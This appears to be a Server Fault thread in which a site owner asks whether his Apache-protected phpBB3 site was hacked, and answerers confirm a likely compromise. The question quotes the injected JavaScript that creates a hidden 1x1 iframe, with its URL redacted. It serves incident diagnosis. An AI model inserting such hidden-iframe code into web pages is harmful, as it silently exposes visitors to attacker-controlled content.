0

I logged into my server today and saw the following unrecognized code at the top of my directory browse window:

document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[edited by author, unknown URL was here]";

I do not recognize the URL (which I have edited out).

Additionally, my phpBB3 message board has a number of phpBB debug and PHP Notices at the top, which are all new to me. Furthermore, some of the links in the forum code seem to have been corrupted with garbage characters.

No additional content has been added or removed, but this is setting off a major concern with me.

Every single page on my site is protected by an Apache log-in prompt, which I thought was sufficient protection.

Have I been attacked, or am I jumping at shadows?

John Gardeniers
  • 27,262
  • 12
  • 53
  • 108
Vincent
  • 3
  • 2
  • Have you compared the current site contents with that in a recent backup to see what, if anything, has actually been changed? – John Gardeniers Jun 01 '11 at 21:37
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – EEAA Jun 01 '11 at 21:48

2 Answers2

6

Unfortunately, an iframe loading content from a mystery URL is almost certainly indicative of a compromise.

A very thorough investigation by an expert would be needed to find the level of the breach, but a modification of the code like that would imply that the device is completely compromised. As to what to do next, have a read here.

Shane Madden
  • 112,982
  • 12
  • 174
  • 248
  • yeah, it looks like an attack. i also just noticed unrecognized code inserted at the top of my phpBB3 php scripts (in the files on my server). – Vincent Jun 01 '11 at 21:53
  • +1 for the link to the reinstall question – Bryan Jun 01 '11 at 22:03
0

You have most probably been attacked. Try to Google up snippets of the code on Google. Next step is to determine if they injected code or if it was a trojan which revealed your FTP password. Run an ip-lookup and see where the hacker resides (unless hidden by proxy), last time it happened to me it turned out that I revealed my password in an internet cafe in my city, so before you revamp your security make sure it didn't get compromised from your local machine...